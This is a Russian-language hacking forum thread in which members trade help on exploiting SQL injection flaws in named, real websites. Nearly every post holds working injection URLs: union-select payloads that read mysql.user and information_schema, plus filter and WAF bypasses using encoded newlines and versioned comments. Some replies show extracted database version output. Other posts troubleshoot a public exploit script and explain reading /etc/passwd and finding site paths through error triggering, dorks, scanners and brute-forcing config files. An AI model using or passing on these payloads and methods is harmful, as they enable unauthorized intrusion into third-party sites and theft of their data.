Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    http://betz.su/myturnir/turnir.php?tur=455%27+and+substring((@@version),1,1)='5
    Нет нечего
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Blind MySQL-Injection ? Не слышал, не ?

    А тут читал ??
     
    _________________________
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    а ты читал что
    , а стало быть подзапросы не работают?
     
    _________________________
    2 people like this.
  4. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Как обойти зашиту от Spaceweb?

    У меня такой запрос:

    PHP:
    http://site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+mysql.user+--+
    Но после выполняется редирект на сайт Spaceweb, как обойти это?
     
  5. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Попытаться вызвать ошибку, например используя extravalue()
     
    _________________________
  6. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://site.ru/news_view.php?id=-189'+union%0Aselect+1,2,3,4,5,6,7,file_priv,9+from+mysql.user+--+
     
  7. compod

    compod Member

    Joined:
    28 Sep 2010
    Messages:
    29
    Likes Received:
    21
    Reputations:
    1
    Добрый день, я совсем новичок, и вот нашел парсером скуль и начал пробовать вот так:
    Code:
    http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10/*
    http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10
    http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10
    http://prazdnik.com.ua/index.php?id=54&pid=-3509+order+by+10/*
    http://prazdnik.com.ua/index.php?id=54&pid=1+order+by+10
    http://prazdnik.com.ua/index.php?id=54&pid=-1+order+by+10
    http://prazdnik.com.ua/index.php?id=54&pid=1+union+select+1,2,3,4,5
    и т.д.
    Но нужных ошибок я все равно не получил, кто может раскрутите, покажите и ткните что я неправильно сделал
     
  8. a.dimka

    a.dimka Member

    Joined:
    14 Dec 2011
    Messages:
    0
    Likes Received:
    10
    Reputations:
    3
    to compod

    http://prazdnik.com.ua/index.php?id=54&pid=3509-9999.9+union+select+111111,version(),33333333,44444444,555555,6666666,7777777,8888888,9999999,10,11,12,13,14,15--+f

    Вывод в исходном коде на 399 строке

    либо в середине страницы

    5.0.51a-24+lenny5-log
     
    1 person likes this.
  9. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    http://prazdnik.com.ua/index.php?id=54&pid=3509+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--

    Самые забавные первоапрельские розыгрыши 2013 на телефон
    5.0.51a-24+lenny5-log
     
    _________________________
  10. compod

    compod Member

    Joined:
    28 Sep 2010
    Messages:
    29
    Likes Received:
    21
    Reputations:
    1
    а как ты узнал что выводиться именно вторая колонка?
     
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    https://forum.antichat.ru/thread43966.html
    читай полностью.
    именно пункт "2.1.2 Определение выводимых столбцов"
     
    _________________________
  12. a.dimka

    a.dimka Member

    Joined:
    14 Dec 2011
    Messages:
    0
    Likes Received:
    10
    Reputations:
    3
    Интуиция
     
  13. a.dimka

    a.dimka Member

    Joined:
    14 Dec 2011
    Messages:
    0
    Likes Received:
    10
    Reputations:
    3
    http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10/*!union%23%0aselect+1,2,3,table_name,5,6,7,8,9*/from%23%0ainformation_schema.tables--+f&galid=1&area=1&ascdesc=desc

    Фильтруется точка,как нибудь обойти можно?
     
  14. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10 /*!union*//*!select*/ 1,2,3,(select table_name from `information_schema`.`tables` limit 1),5,6,7,8,9&galid=1&area=1&ascdesc=desc
     
    1 person likes this.
  15. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Пытаюсь заюзать вот этот эксплоит _http://forum.antichat.ru/showpost.php?p=2748145&postcount=24

    Но выдает ошибку syntax error, unexpected T_String in "путь до эксплоита" on line 169

    Запускал так, забивал в командную строку "Путь до php.exe" "Путь до эксплоита"
    Прошу помощи..)!
     
  16. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Строка 169, более подробно
    Убери пробелы. Делаю ставку на то, что после исправления, будет ошибка указывающая на 191 строку =)
     
    _________________________
    #20856 VY_CMa, 30 Jul 2012
    Last edited: 30 Jul 2012
  17. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Ок, спасибо!! В следующий раз буду внимательней.
    Жаль только что эксплоит выстрелил неудачно :(
     
  18. Blacktell

    Blacktell New Member

    Joined:
    2 Jul 2012
    Messages:
    54
    Likes Received:
    1
    Reputations:
    0
    читается файл /etc/passwd через sql injection
    как найти абсолютный путь к сайту?
     
  19. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Говорю несколько способов.
    Смотря какая CMS, для каждой есть свои способы
    1) В куку сессии подставить спец символ, например "^"
    2) Юзать гугл с текстом site:факме.рф intext:error
    3) Пытаться подставлять в параметры зависящие от пользователя, т.е. head, post, get etc. всякую лабуду, которая может неправильно обработаться скриптом.
    4) Найти phpinfo файл
    5) Х*ярить сканером на файлы до посинения с помощью того же ArxScanSite с целью поиска файла оставленного мастером с таким содержанием: getcwd() или $SERVER['DOCUMENT_ROOT'] - если php конечно.
     
    _________________________
    #20859 VY_CMa, 30 Jul 2012
    Last edited: 30 Jul 2012
  20. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    Если нет вывода ошибок содержащих путь сайта, то следует использовать брутфорс конфигурационных файлов WEB-сервера скриптами типа Toolza и д.р.
    К примеру CentOS, Fedora (Redhat-системы) и сервер Apache
    /etc/httpd/conf/httpd.conf
    Там смотришь секции DocumentRoot, VirtualHost.
     
    #20860 Ravenous, 30 Jul 2012
    Last edited: 30 Jul 2012
Thread Status:
Not open for further replies.